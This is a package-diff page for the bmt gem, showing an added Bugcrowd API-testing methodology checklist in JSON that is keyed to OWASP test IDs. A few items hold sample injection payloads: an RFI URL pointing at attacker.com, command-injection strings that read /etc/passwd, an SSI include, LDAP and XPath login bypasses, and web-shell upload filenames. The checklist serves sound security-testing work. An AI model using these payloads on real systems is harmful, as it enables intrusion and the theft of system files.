bmt 0.5.0 → 0.5.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (13) hide show
  1. checksums.yaml +4 -4
  2. data/lib/bmt/version.rb +1 -1
  3. data/lib/data/0.1/mappings/templates.json +17 -0
  4. data/lib/data/0.1/mappings/templates.schema.json +62 -0
  5. data/lib/data/0.1/methodologies/api_testing.json +659 -0
  6. data/lib/data/0.1/methodologies/binaries.json +252 -0
  7. data/lib/data/0.1/methodologies/mobile_android.json +514 -0
  8. data/lib/data/0.1/methodologies/mobile_ios.json +452 -0
  9. data/lib/data/0.1/methodologies/network.json +207 -0
  10. data/lib/data/0.1/methodologies/template.json +83 -0
  11. data/lib/data/0.1/methodologies/website_testing.json +886 -0
  12. data/lib/data/0.1/schema.json +124 -0
  13. metadata +12 -2
data/lib/data/0.1/methodologies/api_testing.json ADDED
@@ -0,0 +1,659 @@
1
+ {
2
+ "metadata": {
3
+ "title": "API Testing",
4
+ "release_date": "2023-03-31T00:00:00+00:00",
5
+ "description": "Bugcrowd api methodology testing",
6
+ "vrt_version": "10.0.1"
7
+ },
8
+ "content": {
9
+ "steps": [
10
+ {
11
+ "key": "information",
12
+ "title": "Information gathering",
13
+ "description": "",
14
+ "type": "checklist",
15
+ "items": [
16
+ {
17
+ "key": "review_documentation",
18
+ "title": "Review Documentation",
19
+ "description": "Review provided documentation or Swagger Files for any leaked or hidden endpoints.",
20
+ "caption": ""
21
+ },
22
+ {
23
+ "key": "check_wsdl_files",
24
+ "title": "Check for .wsdl files",
25
+ "description": "Check for web service description language (.wsdl) files for SOAP APIs.",
26
+ "tools": "Burp Proxy, FFUF, WFuzz, Gobuster",
27
+ "caption": ""
28
+ },
29
+ {
30
+ "key": "check_graphql_introspection",
31
+ "title": "Check for GraphQL Introspection",
32
+ "description": "Check for enabled Introspection using GraphQL query.",
33
+ "tools": "Burp Proxy + GraphQL Raider (BAPP)",
34
+ "caption": ""
35
+ },
36
+ {
37
+ "key": "search_leaked_api_keys",
38
+ "title": "Search for leaked API Keys",
39
+ "description": "Black box only - Search for leaked online API keys on Github, Gitlab etc.",
40
+ "tools": "TruffleHog",
41
+ "caption": ""
42
+ },
43
+ {
44
+ "key": "fingerprint",
45
+ "title": "Fingerprint Web Server",
46
+ "caption": "OTG-INFO-002, WAHHM - Recon and Analysis",
47
+ "description": "Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using 'HTTP header field ordering' and 'Malformed requests test.'",
48
+ "tools": "Httprint, Httprecon, Desenmascarame",
49
+ "vrt_category": "server_security_misconfiguration"
50
+ },
51
+ {
52
+ "key": "webserver_metafiles",
53
+ "title": "Review Webserver Metafiles for Information Leakage",
54
+ "caption": "OTG-INFO-003, WAHHM - Recon and Analysis",
55
+ "description": "Analyze robots.txt and identify <META> Tags from website.",
56
+ "tools": "Browser, curl, wget"
57
+ },
58
+ {
59
+ "key": "enumerate_applications",
60
+ "title": "Enumerate Applications on Webserver",
61
+ "caption": "if in scope OTG-INFO-004, WAHHM - Recon and Analysis",
62
+ "description": "Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers",
63
+ "tools": "Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue"
64
+ },
65
+ {
66
+ "key": "application_entry_points",
67
+ "title": "Identify application entry points",
68
+ "caption": "OTG-INFO-006, WAHHM - Recon and Analysis",
69
+ "description": "Identify from hidden fields, parameters, methods HTTP header analysis",
70
+ "tools": "Burp proxy, ZAP, Tamper data"
71
+ },
72
+ {
73
+ "key": "fingerprint_webapp_framework",
74
+ "title": "Fingerprint Web Application Framework",
75
+ "caption": "OTG-INFO-008, WAHHM - Recon and Analysis",
76
+ "description": "Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.",
77
+ "tools": "Whatweb, BlindElephant, Wappalyzer"
78
+ },
79
+ {
80
+ "key": "fingerprint_webapp",
81
+ "title": "Fingerprint Web Application",
82
+ "caption": "OTG-INFO-009, WAHHM - Recon and Analysis",
83
+ "description": "Identify the web application and version to determine known vulnerabilities and the appropriate exploits.",
84
+ "tools": "Whatweb, BlindElephant, Wappalyzer, CMSmap"
85
+ },
86
+ {
87
+ "key": "application_architecture",
88
+ "title": "Map Application Architecture",
89
+ "caption": "OTG-INFO-010, WAHHM - Recon and Analysis",
90
+ "description": "Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database",
91
+ "tools": "Browser, curl, wget"
92
+ }
93
+ ]
94
+ },
95
+ {
96
+ "key": "config_and_deploy_management",
97
+ "title": "Configuration and Deploy Management Testing",
98
+ "description": "",
99
+ "type": "checklist",
100
+ "items": [
101
+ {
102
+ "key": "network_and_infrastructure",
103
+ "title": "Test Network/Infrastructure Configuration",
104
+ "caption": "OTG-CONFIG-001, WAHHM - Recon and Analysis, Assess Application Hosting",
105
+ "description": "Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.",
106
+ "tools": "Nessus",
107
+ "vrt_category": "server_security_misconfiguration"
108
+ },
109
+ {
110
+ "key": "application_platform",
111
+ "title": "Test Application Platform Configuration",
112
+ "caption": "OTG-CONFIG-002, WAHHM - Recon and Analysis",
113
+ "description": "Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.",
114
+ "tools": "Browser, Nikto",
115
+ "vrt_category": "server_security_misconfiguration"
116
+ },
117
+ {
118
+ "key": "admin_interfaces",
119
+ "title": "Enumerate Infrastructure and Application Admin Interfaces",
120
+ "caption": "OTG-CONFIG-005, WAHHM - Recon and Analysis",
121
+ "description": "Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)",
122
+ "tools": "Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner"
123
+ },
124
+ {
125
+ "key": "http_methods",
126
+ "title": "Test HTTP Methods",
127
+ "caption": "OTG-CONFIG-006, WAHHM - Test Handling of Access",
128
+ "description": "Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST",
129
+ "tools": "netcat, curl",
130
+ "vrt_category": "server_security_misconfiguration"
131
+ },
132
+ {
133
+ "key": "http_transport_security",
134
+ "title": "Test HTTP Strict Transport Security",
135
+ "caption": "OTG-CONFIG-007, WAHHM - Test Handling of Access",
136
+ "description": "Identify HSTS header on Web server through HTTP response header. curl -s -D- https://domain.com/ | grep Strict",
137
+ "tools": "Burp Proxy, ZAP, curl",
138
+ "vrt_category": "server_security_misconfiguration"
139
+ },
140
+ {
141
+ "key": "ria_cross_domain_policy",
142
+ "title": "Test RIA cross domain policy",
143
+ "caption": "OTG-CONFIG-008, WAHHM - Test Handling of Access",
144
+ "description": "Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.",
145
+ "tools": "Burp Proxy, ZAP, Nikto",
146
+ "vrt_category": "server_security_misconfiguration"
147
+ }
148
+ ]
149
+ },
150
+ {
151
+ "key": "identity_management",
152
+ "title": "Identity Management Testing",
153
+ "description": "",
154
+ "type": "checklist",
155
+ "items": [
156
+ {
157
+ "key": "role_definition",
158
+ "title": "Test Role Definitions",
159
+ "caption": "OTG-IDENT-001, WAHHM - Test Handling of Access",
160
+ "description": "Validate the system roles defined within the application by creating a permission matrix.",
161
+ "tools": "Burp Proxy, ZAP",
162
+ "vrt_category": "broken_access_control"
163
+ },
164
+ {
165
+ "key": "user_registration",
166
+ "title": "Test User Registration Process",
167
+ "caption": "OTG-IDENT-002, WAHHM - Test Handling of Access",
168
+ "description": "Verify that the identity requirements for user registration are aligned with business and security requirements",
169
+ "tools": "Burp Proxy, ZAP",
170
+ "vrt_category": "server_security_misconfiguration"
171
+ },
172
+ {
173
+ "key": "guessable_user_accounts",
174
+ "title": "Testing for Account Enumeration and Guessable User Account",
175
+ "caption": "OTG-IDENT-004, WAHHM - Test Handling of Access",
176
+ "description": "Generic login error statement check, return codes/parameter values, enumerate all possible valid user ids (Login system, Forgot password)",
177
+ "tools": "Browser, Burp Proxy, ZAP",
178
+ "vrt_category": "server_security_misconfiguration"
179
+ },
180
+ {
181
+ "key": "guest_accounts_permission",
182
+ "title": "Test Permissions of Guest/Training Accounts",
183
+ "caption": "OTG-IDENT-006, WAHHM - Test Handling of Access",
184
+ "description": "Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorization process required for access. Evaluate consistency between access policy and guest/training account access permissions.",
185
+ "tools": "Burp Proxy, ZAP",
186
+ "vrt_category": "server_security_misconfiguration"
187
+ },
188
+ {
189
+ "key": "account_suspension_resumption",
190
+ "title": "Test Account Suspension/Resumption Process",
191
+ "caption": "OTG-IDENT-007, WAHHM - Test Handling of Access",
192
+ "description": "Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.",
193
+ "tools": "Burp Proxy, ZAP",
194
+ "vrt_category": "server_security_misconfiguration"
195
+ }
196
+ ]
197
+ },
198
+ {
199
+ "key": "authentication",
200
+ "title": "Authentication Testing",
201
+ "description": "",
202
+ "type": "checklist",
203
+ "items": [
204
+ {
205
+ "key": "tenant_authentication_reuse",
206
+ "title": "Test tenant authentication re-use",
207
+ "caption": "",
208
+ "description": "Check to see if auth parameters are being reused from one tenant to another.",
209
+ "tools": "Burp Proxy, curl, swagger-ui, mitmproxy, Hackverter"
210
+ },
211
+ {
212
+ "key": "encrypted_credentials",
213
+ "title": "Testing for Credentials Transported over an Encrypted Channel",
214
+ "caption": "OTG-AUTHN-001, WAHHM - Miscellaneous Tests",
215
+ "description": "Check the referrer whether it’s HTTP or HTTPs. Sending data through HTTP and HTTPS.",
216
+ "tools": "Burp Proxy, ZAP",
217
+ "vrt_category": "broken_authentication_and_session_management"
218
+ },
219
+ {
220
+ "key": "lock_out_mechanism",
221
+ "title": "Testing for Weak lock out mechanism",
222
+ "caption": "OTG-AUTHN-003, WAHHM - Test Handling of Access",
223
+ "description": "Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.",
224
+ "tools": "Browser",
225
+ "vrt_category": "server_security_misconfiguration"
226
+ },
227
+ {
228
+ "key": "password_policy",
229
+ "title": "Testing for Weak password policy",
230
+ "caption": "OTG-AUTHN-007, WAHHM - Test Handling of Access",
231
+ "description": "Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of Passwords.",
232
+ "tools": "Burp Proxy, ZAP, Hydra",
233
+ "vrt_category": "insufficient_security_configurability"
234
+ },
235
+ {
236
+ "key": "alternative_channel",
237
+ "title": "Testing for Weaker authentication in alternative channel",
238
+ "caption": "OTG-AUTHN-010, WAHHM - Test Handling of Access",
239
+ "description": "Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)",
240
+ "tools": "Browser"
241
+ }
242
+ ]
243
+ },
244
+ {
245
+ "key": "authorization",
246
+ "title": "Authorization Testing",
247
+ "description": "",
248
+ "type": "checklist",
249
+ "items": [
250
+ {
251
+ "key": "broken_access_resource_level_objects",
252
+ "title": "Test for broken access to resource-level objects",
253
+ "caption": "",
254
+ "description": "Can any of the resource-level objects be accessed without a valid token?",
255
+ "tools": "Burp Proxy, curl, swagger-ui, mitmproxy, Hackverter",
256
+ "vrt_category": "broken_access_control"
257
+ },
258
+ {
259
+ "key": "broken_access_field_level_objects",
260
+ "title": "Test for broken access to field-level objects",
261
+ "caption": "",
262
+ "description": "Can any of the field-level objects be accessed without a valid token?",
263
+ "tools": "Burp Proxy, curl, swagger-ui, mitmproxy, Hackverter",
264
+ "vrt_category": "broken_access_control"
265
+ },
266
+ {
267
+ "key": "broken_access_endpoints",
268
+ "title": "Test for broken access to endpoints",
269
+ "caption": "",
270
+ "description": "Can the endpoints be accessed without a valid token?",
271
+ "tools": "Burp Proxy, curl, swagger-ui, mitmproxy, Hackverter",
272
+ "vrt_category": "broken_access_control"
273
+ },
274
+ {
275
+ "key": "cross_tenant_access_control_issues",
276
+ "title": "Test for cross-tenant access control issues",
277
+ "caption": "",
278
+ "description": "Can any of the endpoints be accessed for a different tenant with current tenant tokens?",
279
+ "tools": "Burp Proxy, curl, swagger-ui, mitmproxy, Hackverter",
280
+ "vrt_category": "broken_access_control"
281
+ },
282
+ {
283
+ "key": "directory_traversal_and_file_include",
284
+ "title": "Testing Directory traversal/file include",
285
+ "caption": "OTG-AUTHZ-001, WAHHM - Test Handling of Input",
286
+ "description": "dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.",
287
+ "tools": "Burp Proxy, ZAP, Wfuzz",
288
+ "vrt_category": "server_side_injection"
289
+ },
290
+ {
291
+ "key": "privilege_escalation",
292
+ "title": "Testing for Privilege Escalation",
293
+ "caption": "OTG-AUTHZ-003, WAHHM - Test Handling of Access",
294
+ "description": "Testing for role/privilege manipulates the values of hidden variables. Change some param groupid=2 to groupid=1",
295
+ "tools": "Burp Proxy (Authorize), ZAP",
296
+ "vrt_category": "broken_authentication_and_session_management"
297
+ },
298
+ {
299
+ "key": "direct_object_reference",
300
+ "title": "Testing for Insecure Direct Object References",
301
+ "caption": "OTG-AUTHZ-004, WAHHM - Test Handling of Access",
302
+ "description": "Force changing parameter value (?invoice=123 -> ?invoice=456)",
303
+ "tools": "Burp Proxy (Authorize), ZAP",
304
+ "vrt_category": "broken_access_control"
305
+ }
306
+ ]
307
+ },
308
+ {
309
+ "key": "session_management",
310
+ "title": "Session Management Testing",
311
+ "description": "",
312
+ "type": "checklist",
313
+ "items": [
314
+ {
315
+ "key": "bypass_schema",
316
+ "title": "Testing for Bypassing Session Management Schema",
317
+ "caption": "OTG-SESS-001, WAHHM - Test Handling of Access",
318
+ "description": "SessionID analysis prediction, unencrypted cookie transport, brute-force.",
319
+ "tools": "Burp Proxy, ForceSSL, ZAP, CookieDigger",
320
+ "vrt_category": "broken_authentication_and_session_management"
321
+ },
322
+ {
323
+ "key": "cookies",
324
+ "title": "Testing for Cookies attributes",
325
+ "caption": "OTG-SESS-002, WAHHM - Test Handling of Access",
326
+ "description": "Check HTTPOnly and Secure flag expiration, inspect for sensitive data.",
327
+ "tools": "Burp Proxy, ZAP",
328
+ "vrt_category": "server_security_misconfiguration"
329
+ },
330
+ {
331
+ "key": "fixation",
332
+ "title": "Testing for Session Fixation",
333
+ "caption": "OTG-SESS-003, WAHHM - Test Handling of Access",
334
+ "description": "The application doesn't renew the cookie after a successful user authentication.",
335
+ "tools": "Burp Proxy, ZAP",
336
+ "vrt_category": "broken_authentication_and_session_management"
337
+ },
338
+ {
339
+ "key": "exposed_variables",
340
+ "title": "Testing for Exposed Session Variables",
341
+ "caption": "OTG-SESS-004, WAHHM - Test Handling of Access",
342
+ "description": "Encryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?",
343
+ "tools": "Burp Proxy, ZAP",
344
+ "vrt_category": "broken_authentication_and_session_management"
345
+ },
346
+ {
347
+ "key": "logout",
348
+ "title": "Testing for logout functionality",
349
+ "caption": "OTG-SESS-006, WAHHM - Test Handling of Access",
350
+ "description": "Check reuse session after logout both server-side and SSO.",
351
+ "tools": "Burp Proxy, ZAP",
352
+ "vrt_category": "broken_authentication_and_session_management"
353
+ },
354
+ {
355
+ "key": "timeout",
356
+ "title": "Test Session Timeout",
357
+ "caption": "OTG-SESS-007, WAHHM - Test Handling of Access",
358
+ "description": "Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.",
359
+ "tools": "Burp Proxy, ZAP",
360
+ "vrt_category": "broken_authentication_and_session_management"
361
+ },
362
+ {
363
+ "key": "puzzling",
364
+ "title": "Testing for Session puzzling",
365
+ "caption": "OTG-SESS-008, WAHHM - Test Handling of Access",
366
+ "description": "The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.",
367
+ "tools": "Burp Proxy, ZAP",
368
+ "vrt_category": "broken_authentication_and_session_management"
369
+ }
370
+ ]
371
+ },
372
+ {
373
+ "key": "data_validation",
374
+ "title": "Data Validation Testing",
375
+ "description": "",
376
+ "type": "checklist",
377
+ "items": [
378
+ {
379
+ "key": "http_verb_tampering",
380
+ "title": "Testing for HTTP Verb Tampering",
381
+ "caption": "OTG-INPVAL-003, WAHHM - Test Handling of Input",
382
+ "description": "Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.",
383
+ "tools": "netcat",
384
+ "vrt_category": "server_security_misconfiguration"
385
+ },
386
+ {
387
+ "key": "http_param_pollution",
388
+ "title": "Testing for HTTP Parameter pollution",
389
+ "caption": "OTG-INPVAL-004, WAHHM - Test Handling of Input",
390
+ "description": "Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP",
391
+ "tools": "ZAP, HPP Finder (Chrome Plugin)",
392
+ "vrt_category": "server_side_injection"
393
+ },
394
+ {
395
+ "key": "sql_injection",
396
+ "title": "Testing for SQL Injection",
397
+ "caption": "OTG-INPVAL-005, WAHHM - Test Handling of Input",
398
+ "description": "Union, Boolean, Error based, Out-of-band, Time delay.",
399
+ "tools": "Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)",
400
+ "vrt_category": "server_side_injection"
401
+ },
402
+ {
403
+ "key": "oracle",
404
+ "title": "Oracle Testing",
405
+ "caption": "",
406
+ "description": "Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection",
407
+ "tools": "Orascan, SQLInjector"
408
+ },
409
+ {
410
+ "key": "mysql",
411
+ "title": "MySQL Testing",
412
+ "caption": "",
413
+ "description": "Identify MySQL version, Single quote, Information_schema, Read/Write file.",
414
+ "tools": "SQLMap, Mysqloit, Power Injector"
415
+ },
416
+ {
417
+ "key": "sql_server",
418
+ "title": "SQL Server Testing",
419
+ "caption": "",
420
+ "description": "Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)",
421
+ "tools": "SQLMap, SQLninja, Power Injector"
422
+ },
423
+ {
424
+ "key": "postgre_sql",
425
+ "title": "Testing PostgreSQL",
426
+ "caption": "",
427
+ "description": "Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)",
428
+ "tools": "SQLMap"
429
+ },
430
+ {
431
+ "key": "ms_access",
432
+ "title": "MS Access Testing",
433
+ "caption": "",
434
+ "description": "Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.",
435
+ "tools": "SQLMap"
436
+ },
437
+ {
438
+ "key": "nosql_injection",
439
+ "title": "Testing for NoSQL injection",
440
+ "caption": "",
441
+ "description": "dentify NoSQL databases, Pass special characters (' \" \\ ; { } ), Attack with reserved variable name, operator.",
442
+ "tools": "NoSQLMap"
443
+ },
444
+ {
445
+ "key": "ldap_injection",
446
+ "title": "Testing for LDAP Injection",
447
+ "caption": "OTG-INPVAL-006, WAHHM - Test Handling of Input",
448
+ "description": "/ldapsearch?user=*user=*user=*)(uid=*))(|(uid=*pass=password",
449
+ "tools": "Burp Proxy, ZAP",
450
+ "vrt_category": "server_side_injection"
451
+ },
452
+ {
453
+ "key": "orm_injection",
454
+ "title": "Testing for ORM Injection",
455
+ "caption": "OTG-INPVAL-007, WAHHM - Test Handling of Input",
456
+ "description": "Testing ORM injection is identical to SQL injection testing",
457
+ "tools": "Hibernate, Nhibernate",
458
+ "vrt_category": "server_side_injection"
459
+ },
460
+ {
461
+ "key": "xml_injection",
462
+ "title": "Testing for XML Injection",
463
+ "caption": "OTG-INPVAL-008, WAHHM - Test Handling of Input",
464
+ "description": "Check with XML Meta Characters', \" , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG",
465
+ "tools": "Burp Proxy, ZAP, Wfuzz",
466
+ "vrt_category": "server_side_injection"
467
+ },
468
+ {
469
+ "key": "ssi_injection",
470
+ "title": "Testing for SSI Injection",
471
+ "caption": "OTG-INPVAL-009, WAHHM - Test Handling of Input",
472
+ "description": "Presence of .shtml extension, Check for these characters, < ! # = / . \" - > and [a-zA-Z0-9], include String = <!--#include virtual='/etc/passwd'",
473
+ "tools": "Burp Proxy, ZAP",
474
+ "vrt_category": "server_side_injection"
475
+ },
476
+ {
477
+ "key": "xpath_injection",
478
+ "title": "Testing for XPath Injection",
479
+ "caption": "OTG-INPVAL-010, WAHHM - Test Handling of Input",
480
+ "description": "Check for XML error enumeration by supplying a single quote (').\nUsername: ‘ or ‘1’ = ‘1\nPassword: ‘ or ‘1’ = ‘1",
481
+ "tools": "Burp Proxy, ZAP",
482
+ "vrt_category": "server_side_injection"
483
+ },
484
+ {
485
+ "key": "imap_smtp_injection",
486
+ "title": "IMAP/SMTP Injection",
487
+ "caption": "OTG-INPVAL-011, WAHHM - Test Handling of Input",
488
+ "description": "Identifying vulnerable parameters with special characters (i.e.: \\, ‘, “, @, #, !, |).\nUnderstanding the data flow and deployment structure of the client\nIMAP/SMTP command injection (Header, Body, Footer)",
489
+ "tools": "Burp Proxy, ZAP",
490
+ "vrt_category": "server_side_injection"
491
+ },
492
+ {
493
+ "key": "code_injection",
494
+ "title": "Testing for Local File Inclusion",
495
+ "caption": "OTG-INPVAL-012, WAHHM - Test Handling of Input",
496
+ "description": "LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource) Applicable if API is interacting with files.",
497
+ "tools": "Burp Proxy, fimap, Liffy",
498
+ "vrt_category": "server_side_injection"
499
+ },
500
+ {
501
+ "key": "remote_file_inclusion",
502
+ "title": "Testing for Remote File Inclusion",
503
+ "caption": "",
504
+ "description": "RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page",
505
+ "tools": "Burp Proxy, fimap, Liffy"
506
+ },
507
+ {
508
+ "key": "command_injection",
509
+ "title": "Testing for Command Injection",
510
+ "caption": "OTG-INPVAL-013, WAHHM - Test Handling of Input",
511
+ "description": "Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.\n%3Bcat%20/etc/passwd\ntest.pdf+|+Dir C:\\ ",
512
+ "tools": "Burp Proxy, ZAP, Commix",
513
+ "vrt_category": "server_side_injection"
514
+ }
515
+ ]
516
+ },
517
+ {
518
+ "key": "error_handling",
519
+ "title": "Error handling",
520
+ "description": "",
521
+ "type": "checklist",
522
+ "items": [
523
+ {
524
+ "key": "error_codes",
525
+ "title": "Analysis of Error Codes",
526
+ "caption": "OTG-ERR-001, WAHHM - Recon and Analysis",
527
+ "description": "Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)",
528
+ "tools": "Burp Proxy, ZAP",
529
+ "vrt_category": "server_security_misconfiguration"
530
+ },
531
+ {
532
+ "key": "stack_traces",
533
+ "title": "Analysis of Stack Traces",
534
+ "caption": "OTG-ERR-002, WAHHM - Recon and Analysis",
535
+ "description": "Invalid Input / Empty inputs. Input that contains non alphanumeric characters or query syntax. Access to internal pages without authentication. Bypassing application flow.",
536
+ "tools": "Burp Proxy, ZAP",
537
+ "vrt_category": "server_security_misconfiguration"
538
+ }
539
+ ]
540
+ },
541
+ {
542
+ "key": "cryptography",
543
+ "title": "Cryptography",
544
+ "description": "",
545
+ "type": "checklist",
546
+ "items": [
547
+ {
548
+ "key": "transport_layer_protection",
549
+ "title": "Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection",
550
+ "caption": "OTG-CRYPST-001, WAHHM - Test Handling of Access",
551
+ "description": "Identify SSL service, Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)",
552
+ "tools": "testssl.sh, SSL Breacher",
553
+ "vrt_category": "server_security_misconfiguration"
554
+ },
555
+ {
556
+ "key": "unencrypted_channels",
557
+ "title": "Testing for Sensitive information sent via unencrypted channels",
558
+ "caption": "OTG-CRYPST-003, WAHHM - Test Handling of Access",
559
+ "description": "Check sensitive data during the transmission:\nInformation used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…)\nInformation protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customers data)",
560
+ "tools": "Burp Proxy, ZAP, Curl",
561
+ "vrt_category": "broken_authentication_and_session_management"
562
+ }
563
+ ]
564
+ },
565
+ {
566
+ "key": "business_logic",
567
+ "title": "Business Logic Testing",
568
+ "description": "",
569
+ "type": "checklist",
570
+ "items": [
571
+ {
572
+ "key": "data_validation",
573
+ "title": "Test Business Logic Data Validation",
574
+ "caption": "OTG-BUSLOGIC-001, WAHHM - Test for Logic Flaws",
575
+ "description": "Looking for data entry points or hand off points between systems or software.\nOnce found try to insert logically invalid data into the application/system.",
576
+ "tools": "Burp Proxy, ZAP",
577
+ "vrt_category": "broken_access_control"
578
+ },
579
+ {
580
+ "key": "forge_requests",
581
+ "title": "Test Ability to Forge Requests",
582
+ "caption": "OTG-BUSLOGIC-002, WAHHM - Test for Logic Flaws",
583
+ "description": "Looking for guessable, predictable or hidden functionality of fields.\nOnce found, try to insert logically valid data into the application/system allowing the user to go through the application/system against the normal business logic workflow.",
584
+ "tools": "Burp Proxy, ZAP",
585
+ "vrt_category": "server_side_injection"
586
+ },
587
+ {
588
+ "key": "integrity_check",
589
+ "title": "Test Integrity Checks",
590
+ "caption": "OTG-BUSLOGIC-003, WAHHM - Test for Logic Flaws",
591
+ "description": "Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.\nFor each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.\nAttempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the business logic workflow.",
592
+ "tools": "Burp Proxy, ZAP",
593
+ "vrt_category": "broken_access_control"
594
+ },
595
+ {
596
+ "key": "process_timing",
597
+ "title": "Test for Process Timing",
598
+ "caption": "OTG-BUSLOGIC-004, WAHHM - Test for Logic Flaws",
599
+ "description": "Looking for application/system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.\nDevelop and execute the mis-use cases ensuring that attackers cannot gain an advantage based on any timing.",
600
+ "tools": "Burp Proxy, ZAP",
601
+ "vrt_category": "server_side_injection"
602
+ },
603
+ {
604
+ "key": "usage_limits",
605
+ "title": "Test Number of Times a Function Can be Used Limits",
606
+ "caption": "OTG-BUSLOGIC-005, WAHHM - Test for Logic Flaws",
607
+ "description": "Looking for functions or features in the application or system that should not be executed more than a single time or specified number of times during the business logic workflow.\nFor each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.",
608
+ "tools": "Burp Proxy, ZAP",
609
+ "vrt_category": "broken_access_control"
610
+ },
611
+ {
612
+ "key": "workflow_circumvention",
613
+ "title": "Testing for the Circumvention of Work Flows",
614
+ "caption": "OTG-BUSLOGIC-006, WAHHM - Test for Logic Flaws",
615
+ "description": "Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.\nFor each method develop a misuse case and try to circumvent or perform an action that is 'not acceptable' per the business logic workflow.",
616
+ "tools": "Burp Proxy, ZAP",
617
+ "vrt_category": "broken_access_control"
618
+ },
619
+ {
620
+ "key": "application_misuse",
621
+ "title": "Test Defenses Against Application Mis-use",
622
+ "caption": "OTG-BUSLOGIC-007, WAHHM - Test for Logic Flaws",
623
+ "description": "Measures that might indicate the application has in-built self-defense:\nChanged responses, Blocked requests, Actions that log a user out or lock their account",
624
+ "tools": "Burp Proxy, ZAP"
625
+ },
626
+ {
627
+ "key": "upload_unexpected_files",
628
+ "title": "Test Upload of Unexpected File Types",
629
+ "caption": "OTG-BUSLOGIC-008, WAHHM - Test for Logic Flaws",
630
+ "description": "Review the project documentation and perform some exploratory testing looking for file types that should be 'unsupported' by the application/system.\nTry to upload these “unsupported” files and verify that they are properly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. PS. file.phtml, shell.phPWND, SHELL~1.PHP",
631
+ "tools": "Burp Proxy, ZAP"
632
+ },
633
+ {
634
+ "key": "malicious_files",
635
+ "title": "Test Upload of Malicious Files",
636
+ "caption": "OTG-BUSLOGIC-009, WAHHM - Test for Logic Flaws",
637
+ "description": " Develop or acquire a known “malicious” file.\nTry to upload the malicious file to the application/system and verify that it is correctly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.",
638
+ "tools": "Burp Proxy, ZAP",
639
+ "vrt_category": "server_security_misconfiguration"
640
+ }
641
+ ]
642
+ },
643
+ {
644
+ "key": "upload_logs",
645
+ "title": "Upload logs",
646
+ "description": "This should include all associated traffic associated to the in-scope targets.",
647
+ "type": "large_upload"
648
+ },
649
+ {
650
+ "key": "executive_summary",
651
+ "title": "Executive summary",
652
+ "description": "The executive summary should be written with a high-level view of both risk and business impact. It should be concise and clear, therefore it is important to use plain English. This ensures that non-technical readers can gain insight into security concerns outlined in your report.",
653
+ "type": "executive_summary"
654
+ }
655
+ ]
656
+ }
657
+ }
658
+
659
+